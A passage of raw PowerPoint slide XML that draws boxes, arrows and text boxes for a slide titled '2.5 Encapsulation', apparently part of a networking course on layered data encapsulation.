            <a:chOff x="6243065" y="1317497"/>
            <a:chExt cx="864235" cy="774700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="object 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41FB2048-6264-43D9-5DBC-587B01EF60E1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735076" y="774191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="764049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="736393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="695378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="645159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="129031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="78813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="37798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="10142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1" name="object 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E89DCAF1-D190-4F8C-F108-46A7327F786C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2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="37798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="78813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="129031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="645159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="695378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="736393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="764049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735076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4" name="object 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52A9B091-4B84-7D08-8B9B-FE25DD4BB6E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6404077" y="1492379"/>
            <a:ext cx="554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23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2472B53B-19CC-813F-4CBA-9AB979446394}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6994499" y="1247954"/>
            <a:ext cx="1056640" cy="774700"/>
            <a:chOff x="6973061" y="1317497"/>
            <a:chExt cx="1056640" cy="774700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="object 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{454963A3-60B3-8697-397D-E0D520099815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927100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927100" y="774191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977318" y="764049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018333" y="736393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045989" y="695378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="645159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="129031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045989" y="78813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018333" y="37798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977318" y="10142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9" name="object 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB304F38-2459-0302-FC39-E520B73024EF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927100" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977318" y="10142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018333" y="37798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045989" y="78813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="129031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="645159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045989" y="695378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018333" y="736393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977318" y="764049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927100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6" name="object 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F097BB1A-34C5-1A0F-1B6C-7271A9823143}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7136740" y="1492379"/>
            <a:ext cx="5918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27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{294B8C48-EB19-19CD-3ADB-9048665D3FD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5568035" y="2087679"/>
            <a:ext cx="864235" cy="772795"/>
            <a:chOff x="5546597" y="2157222"/>
            <a:chExt cx="864235" cy="772795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="object 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF28CFD7-308A-E767-0D4C-48EE431DBAB7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7" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826388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7" name="object 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39B7BFDD-55A4-6F01-2399-43004C94E105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8" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107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8" name="object 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1D64788-4C9B-2EC2-F63D-168C9E6775FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5706339" y="2332027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31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3890110E-05A9-D3FF-281F-A473792F706B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6296508" y="2087679"/>
            <a:ext cx="1754505" cy="772795"/>
            <a:chOff x="6275070" y="2157222"/>
            <a:chExt cx="1754505" cy="772795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="object 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C731BC03-216B-54AB-9272-5779CD215779}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6275070" y="2157222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4">
                  <a:moveTo>
                    <a:pt x="1625346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1625346" y="772667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1675471" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716404" y="734948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744003" y="694015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754124" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754124" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744003" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716404" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1675471" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625346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5" name="object 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59A96A75-21A2-20BB-983F-88C39E84CF4D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6275070" y="2157222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1625346" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1675471" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716404" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744003" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754124" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754124" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744003" y="694015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716404" y="734948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1675471" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625346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0" name="object 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FED7767-E7E2-B9C0-65FA-4AB5AED000B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6450940" y="2332027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35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3888294-000E-59A2-5DB0-55DA4B4C544A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4824323" y="2925879"/>
            <a:ext cx="864235" cy="772795"/>
            <a:chOff x="4802885" y="2995422"/>
            <a:chExt cx="864235" cy="772795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716DBB58-DCC7-9F09-FF3F-F61C80D936E0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4802885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9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9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8" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826389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9DCC547E-F6B0-88E0-B5E1-07A790075435}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4802885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9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9" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108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9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2" name="object 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21F85D61-1758-D111-90C5-BE33BF914775}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4963516" y="3170608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39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B402CE9-F085-650E-95D7-9EE836C2CEB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5554320" y="2925878"/>
            <a:ext cx="2496820" cy="772795"/>
            <a:chOff x="5532882" y="2995421"/>
            <a:chExt cx="2496820" cy="772795"/>
          </a:xfrm>
        </p:grpSpPr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48B01873-0E0E-6E5B-822B-911A6EE191B3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5532882" y="2995421"/>
              <a:ext cx="2496820" cy="772795"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2496820" h="772795">
                  <a:moveTo>
                    <a:pt x="2367534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2367534" y="772667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417659" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2458592" y="734948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2486191" y="694015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2496312" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2496312" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2486191" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2458592" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417659" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367534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6B1A7C03-0423-1E0C-3E0E-9E1BE6751BB5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5532882" y="2995421"/>
              <a:ext cx="2496820" cy="772795"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2496820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2367534" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417659" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2458592" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2486191" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2496312" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2496312" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2486191" y="694015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2458592" y="734948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417659" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367534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4" name="object 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED55DD65-DDC0-E34C-58BB-91F682E6D691}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5720435" y="3170608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43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{211E3EEF-4CE4-3DEC-A91B-5BFF35DDE416}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3225647" y="1286055"/>
            <a:ext cx="576580" cy="3278504"/>
            <a:chOff x="3204209" y="1355598"/>
            <a:chExt cx="576580" cy="3278504"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="object 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{858DD78D-5391-4893-2B0C-87CE072466F9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432053" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="144017" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144017" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288036" y="3278124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576072" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="2990088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9" name="object 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7E3D7B4-536F-A279-78E1-A370DE897730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0" y="2990088"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="144017" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144017" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576072" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288036" y="3278124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2990088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6" name="object 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D52F00D7-1677-FDDC-C2EE-AC4D5FC41F61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3449803" y="1364617"/>
            <a:ext cx="85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47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE375033-4960-CF41-2BC5-B00DC4E842C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3440659" y="1609142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48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A63FF32-B206-0B13-E9B0-EDCCAF4214C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3440659" y="1852982"/>
            <a:ext cx="1454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" indent="-1905" algn="just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w e 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49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AE7F294-13E2-E7D0-C2E9-FD4F77591E5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429483" y="2828596"/>
            <a:ext cx="126364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  <a:p>
            <a:pPr marL="12700" marR="5080" indent="1270"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a y e r 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50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0786E99B-2284-BA02-AB74-3B9160D4E884}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8122260" y="1290627"/>
            <a:ext cx="576580" cy="3276600"/>
            <a:chOff x="8100822" y="1360170"/>
            <a:chExt cx="576580" cy="3276600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="object 51">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16DEB162-2D87-B941-1B38-6149B2E728CE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8100822" y="1360170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432053" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="144018" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144018" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288035" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576072" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="2988564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7" name="object 52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58AB26BB-217D-D7FB-2080-72CD0A23700B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8100822" y="1360170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0" y="2988564"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="144018" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144018" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576072" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288035" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2988564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1" name="object 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4607AC5-F737-AB67-408E-5465FB1D5728}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8357082" y="1246685"/>
            <a:ext cx="10668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254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 c a p s u l a t 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56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDD9331A-720B-46A2-87DD-DA497AEEDAE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5131791" y="4766534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33" name="object 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04BE664C-33BD-1501-DC0E-EE44D25E19DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5131791" y="4777180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45</a:t>
            </a:fld>
            <a:endParaRPr spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="object 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA39734F-38AC-ED53-5EDC-15A0EE43C8F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8357082" y="3929839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55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6322B9D4-029E-383B-EC47-C15FD2D9108B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8357082" y="4173679"/>
            <a:ext cx="106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412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9351A98-B05A-4403-1CC4-9F6022F52C13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432714" y="185345"/>
            <a:ext cx="33032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Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>5 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2900" b="1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900" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Encapsulation</a:t>
            </a:r>
            <a:endParaRPr sz="2900" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto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6C4D0E40-C0DE-C154-1344-49084BA1A0DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="561696" y="1097078"/>
            <a:ext cx="2543810" cy="815340"/>
            <a:chOff x="540258" y="1166621"/>
            <a:chExt cx="2543810" cy="815340"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70" name="object 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0B03821-A0DF-68D5-4794-D4E954F5D3E2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1" name="object 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
